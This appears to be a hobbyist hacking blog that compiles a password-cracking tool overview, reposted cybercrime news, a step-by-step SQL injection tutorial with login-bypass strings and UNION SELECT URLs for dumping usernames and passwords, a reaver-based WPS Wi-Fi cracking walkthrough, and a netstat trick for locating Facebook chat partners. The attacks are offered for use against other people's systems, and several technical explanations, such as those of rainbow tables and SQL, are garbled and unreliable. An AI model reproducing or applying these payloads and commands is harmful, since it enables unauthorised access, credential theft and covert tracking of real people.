Thursday, 26 May 2016

How To Hack Accounts Passwords -Password Breaking Tools

How To Hack Accounts Passwords -Password Breaking Tools 2016

1.Password hashes:

Passwords that you type in your computer operating systems are stored somewhere on the disc in the form of hashes.These hashes are not in clear text therefore to access these hashes root/sysadmin privilages are required.In windows operating system these hashes are stored on the local disc in the SAM file,while in linux stores these hashes in /etc/shadow file.Hence to encrypt out the password out of these hashes the root access is required and therefore the password can only be cracked by this process only if the operating system can be in your control for some time or you can use the system by your own.






a)Dictionary:

Using dictionary attack to find the password out of hashes is the simplest and fastest method.It just runs through dictionary of words and tries each one of them to check whether it works or not.It could seem to be impossible if it has to be done manually as one cannot try so many passwords at a time but the best thing is that your computer can do so in just a minute or even less to find up the password.Use this trick and find out the password from the hashes where some programs available on internet will help you find the correct password out of the bundle of text of hashes.

b)Rainbow table:

Most systems now a days uses hashes to store the password but as we know these hashes are encrypted files.To crack up the encryption is to take the dictionary file that we has found in above step and hash it again and then compare it with the hash file that was accessed previously from the system.That takes a lot of time and uses intense CPU but this process checks the password that we got through dictionary of hash file to be correct.

2.Using Software to hack:

There are many softwares available on the internet that do help you to crack the various accounts.These softwares uses some commands and some information to find the encrypted pasword and then crack it.Some softwares can even hack the accounts in few minutes which is great but every password cannot be cracked by this method.Still this method is used mostly to crack the accounts as it the easiest method to do so.You just has to provide the required information and the rest of process will be done by softwares only.

Here are some of the best hacking software used till date:

a)John The Ripper:

The world’s best known tool to crack up the passwords that can crack up the password for linux operating system strictly using the command line.It uses built in default password cracking technology and attempts to crack password first by dictionary attack and if that fails it then tries combined dictionary words and still if that does not works it tries the hybrid attack of dictionary words with special characters and words.At last if that all does nothing then it uses its special brute force feature that will be enough to find the required account password.

b) Ophcrack:

It’s a free rainbow table-based password cracking tool for Windows and is among the most popular password cracking tools and can also be used on linux and mac systems.It crackes LM and NTLM hashes.Although this program can crack the password only if you have the hash file of the operating system without that it is of no use.Still it can probably crack most accounts.


How To Hack Accounts Passwords -Password Breaking Tools 2016

3.Online account hacking:

Accounts can be hacked using online hacking tools that uses some information about the account and using that it can crack up the accounts.Online tools are pre programed to do so and can be the easiest way to hack passwords if you are familier with some of the information of account.Following are some of the best online hacking tools that you can use:

a)Brutus:

Many consider it to be the fastest online password hacking tool and is also free and available for both Linux and Windows.It supports password cracking in HTTP,POP3,FTP,SMB,Telnet and other types such as IMAP,NNTP,Netbus,etc.Brutus is open source tool and is best for doing online hacking of many types of accounts.

b) THC-Hydra:

Probably the most widely used online hacking tool that is capable of hacking web form authentication and when it is used with other tools like Tamper Data,it can become a powerful and effective tool for cracking nearly every type of online password authentication mechanism.

4.Password cracking Hardware:

These are special type of machines designed only to perform some type of operation to hack up the data or the accounts of the system when connected to it.These machines or these type of hardware is amazingly powerful and can perform any task in about 1 million of time that general hardware may take.These hardwares can be available on rent for hacking systems or accounts.Some of the best password cracking hardware are:

a)Botnet:

These machines are simply a function of brute force computing power and these machines are basically used for cracking the passwords in very very less time than that of general computers.The same can be done to network also and it can access about network of one million machines.

b)ASIC:

These are application specific devices that can work about to hack any system or account.These machines can work faster than over 100 CPU working togather.

5)Hidden Softwares:

Look like if you are using someone else computer or smartphone and your account was found to be hacked after some days but you remember to log out all the sessions on that system.You could be amazed to know that your login could be recorded on the computer or smartphone by some sort of software or application that remains hidden to other people and can record their passwords and account data also.Here are some softwares that can do up the same trick:

a)Keyloggers:

Keyloggers is a specifically designed software that can record the account logins and send it to a file at a particular location in your storage.That records contain the account details and their passwords also.This software is very popular to hack the accounts if your device is used by others to access their accounts.

b)KeyCounter:

Similar software that also uses the recorded information like Keyloggers.This also is another popular software that is used to hack the accounts using hidden recording of the login details and password.

An African Hacker Stole $2 Million Worth of Airline Tickets Through Phishing

An African hacker, Eric Donys Simeu, 32, of Cameroon pulled off a massive phishing scam that saw him making off with over $2m (£1.38m) worth airline tickets. According to the US Justice Department, Simeu sent out numerous targeted phishing emails between July 2011 and September 2014 to employees of various air travel firms.

The emails were specifically sent to impersonate official communications, in order to trick the victims into opening fake websites and logging in with their official details. The hacker targeted those employees with access to GDS (Global Distribution System) network, which is generally used by air travel and tourism firms to access airline severs to buy or sell flight tickets.
According to the US officials he obtained the GDS login credentials for two companies which includes one from Atlanta, Georgia, and another from Southlake, Texas. After logging into the GDS network he issued numerous airline tickets, which he either used for his personal travels or resold to customers in West Africa at a fraction of their real price.
Simeu was arrested by the French police in September 2014 when attempting to use one of his own fraudulent air tickets to travel from Casablanca, Morocco, to Paris. The US finally extradited Simeu and the case is still being investigated by the FBI and the Justice Department.

Bangladesh Probes 2013 Hack for Links to Central Bank Heist




Bangladesh police are reviewing a nearly forgotten 2013 cyber heist at the nation's largest commercial bank for connections to February's $81 million heist at the country's central bank, a senior law enforcement official said on Wednesday.
The unsolved theft of $250,000 (roughly Rs. 1.67 crores) at Sonali Bank involved fraudulent transfer requests sent over the Swift international payments network. It is not widely known outside of Bangladesh, and in fact was treated as a cold case until Bangladesh police revived the investigation after thieves in February also used the Swift network to steal $81 million from Bangladesh Bank.
Sonali Bank said it had informed Swift about the 2013 heist at the time and also unsuccessfully tried to recover the money from the recipients in Turkey, said one bank source.
Thieves in the 2013 robbery used tactics similar to those used by the yet-to-be-identified criminals in the Bangladesh Bank heist using the Swift money-transfer system to divert bank funds, said a senior bank official. Authorities are now reviewing the case to see if there are any links that can help them track down the criminals behind the Bangladesh Bank heist.
At Sonali Bank, hackers installed key-logger software on a computer to gain passwords to other systems, then sent fraudulent transfer requests over Swift, said the senior bank official who is part of its IT operations.
Police arrested two employees who had responsibility for initiating and approving money transfer instructions, but they were later freed without being charged.
Sonali Bank Managing Director Pradip Kumar Dutta told Reuters that the attackers remain at large and no money has been recovered.
"We could not find out what happened," the official said.
The Sonali Bank cyber heist is the fourth documented case involving fraudulent SWIFT messages and the earliest known case to surface. It is not known whether any of the robberies, including the two attacks on Bangladesh banks, are related.
The two other cases that have come to light are a $12 million (roguhly Rs. 80 crores) theft from Banco del Austro in Ecuador in January and an attack on Vietnam's Tien Phong Bank in December that was not successful. The Sonali Bank theft was reported by Bangladesh media at the time, but has faded from public memory. Police said they only recently became aware of similarities with the central bank heist. "This is an interesting issue that we've come to know," said the senior police official, who declined to be identified further. "We'll have to look into it."
News of these attacks has tested faith in the security of Swift, a key conduit for global financial transactions that is used by more than 11,000 banks and other institutions. Regulators and banks have already implemented reviews of Swift security measures to determine whether other banks could be vulnerable to similar attacks. Swift spokeswoman Natasha de Teran declined to comment on the Sonali case.
"We are actively looking into other possible instances of such fraud, but we will not comment on individual entities," she said.
Bangladesh's Anti Corruption Commission, which investigated the Sonali case, did not have an immediate comment.

Hackers Link Over 2,500 Twitter Accounts to Sex Websites: Symantec


More than 2,500 Twitter accounts have been compromised to tweet links to adult dating and sex websites, global cyber-security leader Symantec said on Tuesday.
There were a number of high-profile accounts caught up in the hacking, including ones belonging to the band Chromeo, a journalist working for The Telegraph, stand-up comedian Azeem Banatwala, Houston Texans wide receiver Cecil Shorts III and the late New York Times reporter David Carr, the report added.
The attackers changed the profile photo and the basic information of the accounts to promote adult sites.
"Rather than tweeting or direct-messaging users, the attackers used these compromised accounts to like tweets and follow other users, hoping to capitalise on users being curious enough to investigate their Twitter profiles," the report noted.
If users visit the compromised profile, they will see tweets - with sexually suggestive photos and shortened links - that claim to offer free sign-ups to watch "hot shows" over webcam or dates and sexual encounters.
Symantec believes the culprit responsible for these compromises earns $4 for each person who signs up for the adult dating site.
The company also noted some steps to secure the Twitter accounts.
It asked users to create strong and unique passwords or use a password manager if you want to create and securely store your passwords.
"Instead of relying on just a password, consider enabling Twitter's Login Verification that requires you to enter a code that is sent to your mobile phone. This adds an extra layer of security," the company said.

Saturday, 17 October 2015

Hlw friends today we are going to know something about SQL Injection,its use vulnerabilities, hoe sql works, what are the commands to make a sql works


 SQL and Its Use: 
 -SQL is a web scripting (computer) language. 
 -SQL is used to make websites. 
 -SQL stands for Structured Query Language. 
 -SQL is used to insert, display and store information from a website on a server.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Tables: 

 -In an SQL database there are tables which store information. -Tables can store any information on a website, ranging from usernames,
passwords, and addresses, to text displayed on a webpage, such as a link or page header. 
 -Tables have columns in which the records (information) are kept. 
 -Each table has a name and each column has a name. 
 -SQL injection means to modify one or more of these tables.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vulnerabilities: 

 -SQL injection vulnerabilities come in two main forms. 
 -Both forms involve injecting SQL code into a website. 
 -To "inject SQL code" means to "write SQL language". 
-By writing SQL language into the site, the website will do what you tell it to do, and you will be able to achieve your goals. 
 - (1) Injecting into a form. Such as username and password boxes on a login page. 
 - (2) Injecting into a URL. Like www.site.com/news.asp?ArticleID=10
------------------------------------------------------------------------------------------------------------------------------------------------------------
Goals: 
 -Your goal as an injector is to outsmart the SQL server. 

-By outsmarting the SQL server you may able to display information from the site's tables on your screen.
  -You may also be able to add and delete information from the tables. 
-In addition, you may be able to bypass certain security measures, like logging in to a site without knowing a real username and password.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

How SQL Works:

 -Before you can perform an injection, you must first understand how SQL works. 
-When you register a new username and password on a website, the username and password you entered is kept in the site's member table; the username and password are put in their separate columns. 
-When you log in with the username and password you registered, the login page looks for a row in the member table that has the same username and password that you supplied. 
-The login form takes the conditions that you supply, and searches the member table for any rows that satisfy those conditions. 
-If a row exists that has both the same username and password, then you are allowed to go on your account. 
-If no row is found, the login page will tell you that the account you specified does not exist, or that your username and password is wrong. 
 -SQL can also display information on a website. 
-If a site has a news section, there may be an SQL table that, for example, holds all of the article names. 
 -More often than not, articles on a website are identified by a number. 
-When you click on a link to an article, you are usually able to see the number of the article you clicked on by looking at the URL of the page you are on. 
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Commands: 

         (a) What They Are and What to Look for: 

-By typing certain words called commands, you are able to tell the SQL server (the website) what you want to do to a specific table, column, or record. 
-In a command, you must specify what you want to do and to what you want to do it. 
-If you are injecting into a URL (link) you place your command after the "=" sign in the URL. 
-If you are injecting into a form, such as a login form, put your command(s) in the boxes where you would normally type your username and password. 
-The website will read what you type and treat it as a command and will do whatever you tell it to do. 
-The possibilities are virtually endless; some examples are reading, changing and adding usernames and passwords on a website, and changing the words on the pages of the website.

          (b) Familiarization and Syntax :  -The manner in which you write commands is called syntax. -You must use the right syntax in order for the SQL server to understand what
you want it to do. 
-Familiarize yourself with the following commands, and use them throughout this paper and during real world SQL injections. 
-Do not worry about correct syntax yet. You will come to learn and eventually memorize it, as you practice and study examples later on in this paper. 
 -Memorization through understanding will benefit you in the long run.  -You will see a language, not just words on a screen. 
 -Not all commands that you will see and use will be listed below. 
-You will soon see other (somewhat confusing) commands, know what they do and how to use them, but probably not understand why they work. 
-For the sake of simplicity, those commands and their uses have been omitted from the following list.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  
 Form Injection: 


 -The easiest SQL injection to perform is called "Authorization Bypass." 

-"Authorization Bypass" refers to SQL injecting into the boxes where you enter your username and password on a website, a.k.a., a login form. 
-As you may recall, in the "How SQL Works" section, login pages check to see if the information that you supplied is a true statement that will return any rows from the member table. 
-We must trick the website into thinking that we have supplied a correct username and password by making it return at least one row. 
-The username and password boxes are each surrounded by invisible single quotes. 
-Whatever is surrounded by the invisible single quotes when the form is submitted is what the site looks for in the member table. See Figure C 
-If you have an opening quotation mark in Authorization Bypass you must always put a closing quotation mark or else you will get an error. 
-For example, if you submit z' (the letter z followed by a single quote) an error will occur because there is an unclosed quotation mark. See Figure D 
-It is important to remember that there are two invisible quotation marks already surrounding each box that you type in. 
 -Now, let's try submitting the following z' OR 'x'='x. 
-In plain English, SQL aside, z' OR 'z'='z tells the server to look for any row with 'z' as the username in the member table or any row where the letter 'x' is the same as 'x'. See Figure E 
-This is a true statement because in every row, table, column and language, the letter x is the same as the letter x. 
-According to the SQL server, this is a valid username because x is the same as x in every row. 
-As strange as it may look, you have satisfied the SQL server's requirements, which are, make sure the username supplied exists in the member table. 
-Supply this as both the username and password, and you will be successfully logged in to the website.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



Attack 1  


GOAL: Obtain a username and password. Vulnerable URL: www.site.com/news.asp?ArticleID=10

  STEP 1: Determine if link is vulnerable. 

a. www.site.com/news.asp?ArticleID=10+AND+1=0-- 
 -Command Translation: Display article 10 only if the number 1 is the same as the  number 0. 
 -In this case, the "AND" command means that in order for the article to be shown,  article 10 must exist AND 1 must equal 0. 
 -This should cause the article to not load because 1 is not the same as 0. 

b. www.site.com/news.asp?ArticleID=10+AND+1=1-- 
 -Command Translation: Display article 10 only if the number 1 is the same as the  number 1. 
 -The article should be shown on the page now because article 10 exists AND 1 is  equal to 1. 
*Since the article loads when you want it to, and doesn't load when you don't want it to, our commands must be working! This means the link is vulnerable and we can continue!*  
 STEP 2: Find total number of columns displayed on the page. 

a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1-- 
 -"ORDER BY 1" (where "1" is the column number) tells the page to display the  first column on the page first. 
 -"ORDER BY 2" would display the second column on the page first. 

b. Repeat step 2a, increasing the number "1" by one each time until you receive an error. 

 i. Stop when you get an error message, subtract one from this number and record  it.   
  -For example, if you receive an error when you reach the number "4"    (www.site.com/news.asp?ArticleID=10+ORDER+BY+4--), subtract one    from "4" to get 3. 

 ii. You have now discovered that there are 3 total columns on the page. 

 STEP 3: Displaying table names. 

*Use the "The INFORMATION_SCHEMA" section as a reference for steps 3 and 4* 

a. www.site.com/news.asp?ArticleID=                                                                                               -1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- 
 -Command Reminder: "SELECT" tells the website to display the information that  you specify from the table that you specify. 
 -Notice: You must change the original article number (10) to negative one. 
 -Notice: The final number from step 2b (in our case, 3) is correctly inserted into  the above command by listing the number "1" to the final number, separating each  with a comma. 
 -You should now see at least one of the numbers you have listed in the command  above displayed somewhere on the webpage. 
 -From here on, you may only replace numbers in the URL with other words if  they have been displayed on the webpage.

b. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES-- 
 -Reminder: You may replace any number that was displayed on the webpage  (preferably only one of them) with "table_name."       -Command Translation: Show me the name of a table.       -A table name, instead of one of the numbers (in our case the number "2"), should  be displayed on the webpage.   STEP 4: Find target table name.  a.  www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES+ WHERE+table_name>'displayed_table'-- 
 -Odds are that the first displayed table_name is not the one you are looking for;  you are looking for the table that stores usernames and passwords. 
 -To navigate a table list to find the right table, add  "+WHERE+table_name>'displayed_table' " (" 'displayed_table' " = the wrong  table name that is being shown) after "TABLES." 
 -Command Translation: Display the name of the next table in the list after  'displayed_table.' 

b. Repeat step 4a until a reasonable name for a members table is displayed. 
 -For our attack, let’s say we have found a table named

c. Remember the table name from step 4b, write it down if

  STEP 5: Displaying column names. 


a. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_S CHEMA.COLUMNS+WHERE+table_name='UserAccounts'-- 
 -Command Translation: Show me the names of the columns in the table  "UserAccounts" 
 -Now, instead of a table_name being displayed, you will see the name of a  column in the table "UserAccounts" being displayed.
 
 STEP 6: Find target columns. 

a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,column_ name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='User Accounts'+AND+column_name>'displayed_column'-- 
 -As in step 4, you will need to find the names of useful columns. 
 -If you are looking for usernames and passwords, you should try to find columns  named username, password, user, pass, login_name, etc... 
 -Command Translation: Display the name of the next column in the list after  'displayed_column.' 

b. Repeat step 6a until you find the right column names. 

 -For our example attack, we will imagine that we have come across columns  named "username" and "password". 

c. Remember the column names from step 6b, write them down if necessary.
  STEP 7: Displaying records (finally!). 

*For this step, have available the table and column names which you have written down.*

    Table Name:        "UserAccounts" 
   Column Names:   "username"                        "password"  

a.  www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,username,3+ FROM+UserAccounts-- 
 -Command Translation: Display the first record in the column "username" from  the table "UserAccounts."       -Let's say the webpage displays the username "Adam" 

b. www.site.com/news.asp?ArticleID= -1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE +username='Adam'--

 -Command Translation: Display the password for the username "Adam" that is  stored in the table UserAccounts. 
 -In our hypothetical attack, the webpage has displayed "neo."

c. You have found the password for the username "Adam", which is "neo." 
 - Username: Adam  - Password: neo  
You have just completed your first SQL injection attack! 

===============================================================

HACK WIFI using these commands

Hlw friends today am going to tell you that how can you crack the password of a wifi of security WPA



Step 1: Open Your Terminal And Type “Ifconfig ’’  And Press Enter to check your Interface status


Step 2:  Here I will be selecting wlan0 as my interface


  And the Next Command Is  “airmon-ng start wlan0”



You Should See Something Like This



Then you can see all the available supplicants and kill them By Using Kill Command


Note : there are 2 methods for going into the next step



1)   By Using Kill Command and Stopping the Wlan0 Supplicants



2)   By Using the Command "airodump-ng mon0" instead of kill and "airodump-ng wlan0" Here i am using Kill Command, Either way we can continue


Now Type The Following Command "airodump-ng wlan0"


Here you can see all the available wifi networks

Press “CTRL + C” To Stop The Search


Now Type “wash –i mono”


this command is used to see all the available wps enabled networks among the available networks



Here you will be shown all "wps" Enabled networks


Press “CTRL +C” To Stop The Search And Select The Network That You Want To Hack



Copy the bssid of the network that you want to hack


Now use The reaver Command

“reaver –i mon0 –b bssid -vv”


Here bssid = the mac address or the bssid  that you copied earlier


 mon0= Interface (you can use either wlan0 or mon0 account to the                                                interface that we started earlier)




Now what you have to do is just wait till it reaches 100%



After reaching 100% You can see the password of that network, as it takes a lot of time I am not able to show you the password of that network. But I will guarantee you that this is the best and easiest way to hack wifi wpa and wpa2 password


Now Almost all of  the routers come with WPS Turned ON.

This is the AP RATE LIMITING SECURITY SYSTEM



If you face this Error, most likely you should stop using this particular method and go for Evil Twin Method, Which can Hack any router but with user Interference. 


The Reason for getting this Error is  WPS Protection is turned "ON" on the victim's Router. We can not this kind of router's using Reaver


If you get an error of AP Rate Limiting then try using the following commands, for very few router's this command will work

“reaver –i mon0 –b bssid –d 30 –vv –dh-small”



If the same thing happens leave that network and opt for another one or  try hacking using another method, but do not stop unfinished work..














Monday, 28 September 2015

Hello friends today m going to tell you that how can you find the exact location and ip addres of the Facebook user and orkut user when he/she is chatting with you                                                                                                   NOTE: whenever u r using this command in your Window on laptop or desktop please remind that all the tabs of the browser should be closed instead of your facebook account or orkut account                                                                                             Hack For Tracing Facebook User Location While Chatting...

HERE IS THE TRICK....

1. First you got to find out the IP address of that User.
To Do so we will be using “netstat” command in windows for this pc trick. If you want to know the IP address of a specific person on facebook or orkut or any chat service, there is only one way: Just invite or ping him for a chat and while chat is ON open ‘Command Prompt‘ on your PC (Start >Run>cmd).
Note: before trying this make sure you close all the other tabs in your browser. and only facebook is open. also if possible delete all the history and cache from your browser.
Now the next step that you have to do for this facebook trick is opens the command prompt Type the following command and hit Enter.
netstat -an.. or you can read my older hack trick to know the ip address of other...
And you will get all established connections IP addresses there. Note down all the suspicious IP’s

2.The Next PC Trick is to trace that user using his IP address:
To do this facebook tricks we will be using IP tracer service. For this Go to the following address : http://www.ip-adress.com/ip_tracer/
and paste the IP address in the box that says “lookup this ip or website”. and it will show you the location of the user.
It will show you all the information about that user along with his ISP and a Location in the MAP. Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area. If any serious matter just note down the ISP details in that page and contact them about the IP. they will respond you. Use this facebook trick if you are in aproblem with some unknown friend.